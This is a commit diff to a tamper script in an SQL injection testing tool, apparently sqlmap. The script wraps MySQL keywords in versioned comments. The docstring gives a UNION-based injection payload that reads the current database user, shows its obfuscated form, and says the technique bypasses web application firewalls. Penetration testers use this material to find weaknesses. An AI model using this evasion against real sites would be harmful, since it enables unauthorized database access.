Revamp of tamper scripts, now supporting dependencies() function as well. Improved a lot the docstring and retested all. Added a new one from Ahmad too.

tamper/versionedmorekeywords.py

@@ -10,18 +10,35 @@ See the file 'doc/COPYING' for copying permission
 import os
 import re
 
-from lib.core.common import randomRange
 from lib.core.common import singleTimeWarnMessage
 from lib.core.data import kb
+from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
 from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
 
 __priority__ = PRIORITY.HIGHER
 
+def dependencies():
+    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
+
 def tamper(payload):
     """
-    Encloses each keyword with versioned MySQL comment (MySQL >= 5.1.13)
-    Example: 'INSERT' will become '/*!INSERT*/'
+    Encloses each keyword with versioned MySQL comment
+
+    Example:
+        * Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
+        * Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
+
+    Requirement:
+        * MySQL >= 5.1.13
+
+    Tested against:
+        * MySQL 5.1.56
+        * MySQL 5.5.11
+
+    Notes:
+        * Useful to bypass several web application firewalls when the
+          back-end database management system is MySQL
     """
 
     def process(match):
@@ -31,8 +48,6 @@ def tamper(payload):
         else:
             return match.group()
 
-    singleTimeWarnMessage("tamper script '%s' is only meant to be run against MySQL >= 5.1.13" % os.path.basename(__file__))
-
     retVal = payload
 
     if payload: